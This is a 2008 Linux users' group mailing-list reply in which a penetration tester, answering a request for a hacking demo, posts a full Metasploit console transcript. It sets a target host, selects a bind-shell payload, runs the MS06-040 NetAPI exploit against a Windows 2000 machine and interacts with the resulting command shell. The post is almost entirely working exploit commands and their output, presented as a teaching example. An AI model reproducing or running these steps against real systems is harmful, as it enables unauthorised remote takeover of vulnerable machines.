Re: [plug] What Do You Wanna Learn From A PLUG Meet?

Drexx Laggui [personal] Wed, 28 May 2008 03:48:58 -0700

28May2008 (UTC +8)

> > On Wednesday 28 May 2008 2:01:34 pm Louie Miranda wrote:
> > > Demonstration on how to hack a Linux system for newbies -- common remote
> > > root exploit or local root exploit.


You mean like this? :) I don't consider posting this info here as
risky because it's almost common-knowledge, and it's an old trick...
Of course, the new or custom 'sploits are confidential.
===============================================================
[EMAIL PROTECTED] msf]$
[EMAIL PROTECTED] msf]$  echo ""; uname -a; echo ""; date; echo ""

Linux ATTACKSTATION 2.6.24.4-64.fc8 #1 SMP Sat Mar 29 09:15:49 EDT
2008 x86_64 x86_64 x86_64 GNU/Linux

Wed Apr 30 23:48:50 PHT 2008

[EMAIL PROTECTED] msf]$
[EMAIL PROTECTED] msf]$ free
             total       used       free     shared    buffers     cached
Mem:       4061864    4037568      24296          0    2953512     113784
-/+ buffers/cache:     970272    3091592
Swap:      4000176         64    4000112

[EMAIL PROTECTED] msf]$
[EMAIL PROTECTED] msf]$ ./msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##


       =[ msf v3.2-release
+ -- --=[ 284 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
       =[ 54 aux

msf > setg RHOST 10.20.10.176
RHOST => 10.20.10.176
msf > setg TARGET 0
TARGET => 0
msf > setg PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf >
msf > use windows/smb/ms06_040_netapi

msf exploit(ms06_040_netapi) > exploit
[*] Started bind handler
[*] Detected a Windows 2000 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:[EMAIL 
PROTECTED]:10.20.10.176[\BROWSER]
...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:[EMAIL 
PROTECTED]:10.20.10.176[\BROWSER]
...
[*] Building the stub data...
[*] Calling the vulnerable function...
[*] Command shell session 1 opened (10.80.56.225:57035 -> 10.20.10.176:4444)

msf exploit(ms06_040_netapi) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.


C:\WINNT\system32>hostname
hostname
win2000

C:\WINNT\system32>ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 10.20.10.176
        Subnet Mask . . . . . . . . . . . : 255.255.0.0
        Default Gateway . . . . . . . . . : 10.20.0.1

C:\WINNT\system32>
C:\WINNT\system32> exit

[*] Command shell session 1 closed.
msf exploit(ms06_040_netapi) >
msf exploit(ms06_040_netapi) > back
msf >
msf > exit
[EMAIL PROTECTED] msf]$
====================================================


Drexx Laggui  -- CISA, CISSP, CFE Associate, ISO27001 LA, CCSI, CSA
http://www.laggui.com  ( Singapore / Manila / California )
Computer forensics; Penetration testing; QMS & ISMS developers; K-Transfer
PGP fingerprint = 6E62 A089 E3EA 1B93 BFB4  8363 FFEC 3976 FF31 8A4E
_________________________________________________
Philippine Linux Users' Group (PLUG) Mailing List
http://lists.linux.org.ph/mailman/listinfo/plug
Searchable Archives: http://archives.free.net.ph

Re: [plug] What Do You Wanna Learn From A PLUG Meet?

Reply via email to